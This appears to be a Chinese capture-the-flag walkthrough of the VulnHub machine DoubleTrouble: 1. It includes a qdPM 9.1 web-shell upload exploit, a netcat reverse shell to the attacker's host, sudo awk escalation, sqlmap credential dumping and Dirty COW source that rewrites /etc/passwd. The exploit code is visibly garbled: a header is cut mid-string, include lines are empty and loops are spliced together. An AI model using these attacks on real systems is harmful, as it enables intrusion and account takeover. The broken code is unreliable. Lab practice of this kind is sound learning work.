vulnhub靶场之DOUBLETROUBLE: 1

准备:

攻击机:虚拟机kali、本机win10。

靶机:DOUBLETROUBLE: 1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/doubletrouble/doubletrouble.ova,下载后直接vbox打开即可。

知识点:stegseek的安装和使用、qdpm9.1l后门漏洞、nc文件传输、shell反弹、wak提权、脏牛提权(CVE-2016-5195)、sql延时注入、sqlmap使用。

vulnhub靶场之DOUBLETROUBLE: 1插图

信息收集:

通过nmap扫描下网段内的存活主机地址,确定下靶机的地址:nmap -sn 192.168.4.0/24,获得靶机地址:192.168.4.195

vulnhub靶场之DOUBLETROUBLE: 1插图1

扫描下端口对应的服务:nmap -T4 -sV -p- -A 192.168.4.195,显示开放了22、80端口,开放了ssh服务、web服务。

vulnhub靶场之DOUBLETROUBLE: 1插图2

使用dirmap进行目录扫描,获得一些目录进行,进行访问测试,最后发现secert存在一张图片。

vulnhub靶场之DOUBLETROUBLE: 1插图3

qdPM 9.1未授权漏洞:

访问下80端口,发现是一个登录界面,显示了所使用的框架信息:qdpm 9.1,但是之前遇到过一个qdpm9.2漏洞,发现这里也是存在的。

vulnhub靶场之DOUBLETROUBLE: 1插图4

在网站:https://www.exploit-db.com/搜索下qdpm9.1是否存在可利用的exp,发现存在未授权访问漏洞,我们可以直接读取/core/config/databases.yml文件,尝试读取下文件信息,获取到数据库账户名和密码:otis/"",但是这个是未开启数据库服务的,应该是没用的信息,先收集下再说。

vulnhub靶场之DOUBLETROUBLE: 1插图5

stegseek获取图片隐藏信息:

根据dirmap扫描出来的目录信息进行访问测试,发现在/secret目录下存在一张图片,下载下来保存,图片显示有otis(上面提到的用户名)、rush(密码中的参数)等信息。

vulnhub靶场之DOUBLETROUBLE: 1插图6vulnhub靶场之DOUBLETROUBLE: 1插图7

使用steghide获取文件隐藏信息:steghide info doubletrouble.jpg,发现是存在隐藏信息的,但是缺少密码无法获取出来,那就尝试下使用隐写爆破工具:stegseek。

vulnhub靶场之DOUBLETROUBLE: 1插图8

stegseek在kali中需要自己安装,在这个网站:https://github.com/RickdeJager/stegseek/releases下载stegseek_0.6-1.deb,使用:sudo dpkg -i stegseek_0.6-1.deb进行安装,安装成功后使用字典进行爆破获得密码和文件名以及登录账户和密码:otisrush@localhost.com/otis666,命令:stegseek --crack doubletrouble.jpg /usr/share/wordlists/rockyou.txt upfine.txt。

vulnhub靶场之DOUBLETROUBLE: 1插图9

vulnhub靶场之DOUBLETROUBLE: 1插图10

qdpm9.1l后门漏洞:

获得系统登陆的账号和密码:otisrush@localhost.com/otis666后使用qdpm9.1的后门漏洞,同样是在网站:https://www.exploit-db.com/搜索下qdpm9.1是否存在可利用的exp。

vulnhub靶场之DOUBLETROUBLE: 1插图11

下载下来exp文件:50175.py(这里我使用的第二个,格式不对需要自己修改,修改后的源码见下),然后输入参数执行,命令:python 50175.py -url http://192.168.4.195/ -p otis666 -u otisrush@localhost.com,返回一个后门连接,访问该目录会显示一个文件:542451-backdoor.php。

vulnhub靶场之DOUBLETROUBLE: 1插图12

vulnhub靶场之DOUBLETROUBLE: 1插图13

qdpm9.1l后门漏洞利用源码 
 # Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2021-08-03
# Original Exploit Author: Rishal Dwivedi (Loginsoft)
# Original ExploitDB ID: 47954
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: "; $cmd = ($_REQUEST['cmd']); system($cmd); echo "

"; die; }?>', 'application/octet-stream')
}
upload_req = session_requests.post(HOSTNAME +
'index.php/myAccount/update', files=request_3)

def main(HOSTNAME, EMAIL, PASSWORD):
url = HOSTNAME + '/index.php/login'
result = session_requests.get(url)
#print(result.text)
login_tree = html.fromstring(result.text)
authenticity_token =list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]
payload = {'login[email]': EMAIL, 'login[password]': PASSWORD,'login[_csrf_token]': authenticity_token}
result = session_requests.post(HOSTNAME + '/index.php/login',data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))
# The designated admin account does not have a myAccount page
account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')
account_tree = html.fromstring(account_page.content)
userid = account_tree.xpath("//input[@name='users[id]']/@value")
username = account_tree.xpath("//input[@name='users[name]']/@value")
csrftoken_ =account_tree.xpath("//input[@name='users[_csrf_token]']/@value")
req(userid, username, csrftoken_, EMAIL, HOSTNAME)
get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')
final_tree = html.fromstring(get_file.content)
backdoor =final_tree.xpath("//input[@name='users[photo_preview]']/@value")
print('Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' +backdoor[-1] + '?cmd=whoami')

if __name__ == '__main__':
print("You are not able to use the designated admin account because they do not have a myAccount page.n")
parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')
parser.add_argument('-url', '--host', dest='hostname', help='Project URL')
parser.add_argument('-u', '--email', dest='email', help='User email(Any privilege account)')
parser.add_argument('-p', '--password', dest='password', help='User password')
args = parser.parse_args()
# Added detection if the arguments are passed and populated, if not display the arguments
if (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)):
main(args.hostname, args.email, args.password)
else:
parser.print_help()

 获取shell权限:

通过命令执行漏洞反弹shell,命令:http://192.168.4.195//uploads/users/542451-backdoor.php?cmd=nc -e /bin/bash 192.168.4.114 6688,kali端开启对6688端口的监听:nc -lvvp 6688,成功获得shell权限,然后通过:python3 -c 'import pty;pty.spawn("/bin/bash")'升级下shell。

vulnhub靶场之DOUBLETROUBLE: 1插图14

 提权:

查看下当前账户是否存在可以使用的特权命令,sudo -l,显示存在一个awk命令。

vulnhub靶场之DOUBLETROUBLE: 1插图15

 查询下awk命令的提权方式进行提权,命令:sudo awk 'BEGIN {system("/bin/sh")}',提权成功。

vulnhub靶场之DOUBLETROUBLE: 1插图16

vulnhub靶场之DOUBLETROUBLE: 1插图17

 去root目录下寻找flag未找到,但是发现了一个虚拟机:doubletrouble.ova。

vulnhub靶场之DOUBLETROUBLE: 1插图18

 第二个靶场下载:

这里使用nc进行文件的传输,靶机中:nc 192.168.4.114 8899 doubletrouble.ova。

vulnhub靶场之DOUBLETROUBLE: 1插图19

第二个靶场的信息收集:

本地使用vbox打开之后使用nmap扫描下地址和服务和扫描第一个靶机一样,发现主机ip:192.168.4.106,该主机同样开放了22和80端口、ssh和web服务。

vulnhub靶场之DOUBLETROUBLE: 1插图20

vulnhub靶场之DOUBLETROUBLE: 1插图21

访问下web服务发现是一个登录窗口,目录扫描也未发现有用的目录文件。

vulnhub靶场之DOUBLETROUBLE: 1插图22

SQL注入:

使用sqlmap测试下注入,看是否存在注入漏洞,命令:sqlmap -u "http://192.168.4.106/index.php" -forms,发现存在时间注入。

vulnhub靶场之DOUBLETROUBLE: 1插图23

然后进行数据库的爆破,命令:sqlmap -u "http://192.168.4.106/index.php" -forms -dbs ,成功获取到数据库:doubletrouble和information_schema。

vulnhub靶场之DOUBLETROUBLE: 1插图24

然后进行数据库表名的爆破,命令:sqlmap -u "http://192.168.4.106/index.php" -forms -D doubletrouble --tables,成功获得表:users。

vulnhub靶场之DOUBLETROUBLE: 1插图25

然后进行表信息的爆破,命令:sqlmap -u "http://192.168.4.106/index.php" -forms -D doubletrouble -T users --dump ,成功获得两组账户名和密码:montreux/GfsZxc1、clapton/ZubZub99。

vulnhub靶场之DOUBLETROUBLE: 1插图26

获取shell:

通过xshell使用账户名和密码进行尝试连接,发现clapton/ZubZub99连接成功获得shell权限。

vulnhub靶场之DOUBLETROUBLE: 1插图27

在当前账户下发现user.txt文件,获取到第一个flag信息。

vulnhub靶场之DOUBLETROUBLE: 1插图28

提权:

查看下当前账户是否存在可以使用的特权命令,sudo -l,显示不存在。

vulnhub靶场之DOUBLETROUBLE: 1插图29

查看下具有root权限的文件,命令:find / -perm -4000 -type f 2>/dev/null,发现存在一个/usr/lib/eject/dmcrypt-get-device,在https://www.exploit-db.com/网站查询可以可以利用的漏洞,发现存在本地提权漏洞,但是经过尝试均失败。

vulnhub靶场之DOUBLETROUBLE: 1插图30

查看下系统内核版本信息,发现存在脏牛漏洞,内核版本:3.2.0-4-amd64。

vulnhub靶场之DOUBLETROUBLE: 1插图31

 可以在这个网站复制源码进行编译:https://github.com/FireFart/dirtycow/blob/master/dirty.c获得可利用的exp获得root权限账户,编译命令:gcc -pthread zangniu.c -o zangniu  -lcrypt,执行命令:./zangniu root。

vulnhub靶场之DOUBLETROUBLE: 1插图32

CVE-2016-5195脏牛漏洞利用代码 
 #include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";

int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;

struct Userinfo {
   char *username;
   char *hash;
   int user_id;
   int group_id;
   char *info;
   char *home_dir;
   char *shell;
};

char *generate_password_hash(char *plaintext_pw) {
  return crypt(plaintext_pw, salt);
}

char *generate_passwd_line(struct Userinfo u) {
  const char *format = "%s:%s:%d:%d:%s:%s:%sn";
  int size = snprintf(NULL, 0, format, u.username, u.hash,
    u.user_id, u.group_id, u.info, u.home_dir, u.shell);
  char *ret = malloc(size + 1);
  sprintf(ret, format, u.username, u.hash, u.user_id,
    u.group_id, u.info, u.home_dir, u.shell);
  return ret;
}

void *madviseThread(void *arg) {
  int i, c = 0;
  for(i = 0; i = 2) {
    plaintext_pw = argv[1];
    printf("Please enter the new password: %sn", plaintext_pw);
  } else {
    plaintext_pw = getpass("Please enter the new password: ");
  }

  user.hash = generate_password_hash(plaintext_pw);
  char *complete_passwd_line = generate_passwd_line(user);
  printf("Complete line:n%sn", complete_passwd_line);

  f = open(filename, O_RDONLY);
  fstat(f, &st);
  map = mmap(NULL,
             st.st_size + sizeof(long),
             PROT_READ,
             MAP_PRIVATE,
             f,
             0);
  printf("mmap: %lxn",(unsigned long)map);
  pid = fork();
  if(pid) {
    waitpid(pid, NULL, 0);
    int u, i, o, c = 0;
    int l=strlen(complete_passwd_line);
    for(i = 0; i

 切换firefart账户,查看账户权限和文件,读取第二个flag的值。

 vulnhub靶场之DOUBLETROUBLE: 1插图33

 

文章来源于互联网:vulnhub靶场之DOUBLETROUBLE: 1

THE END
分享
二维码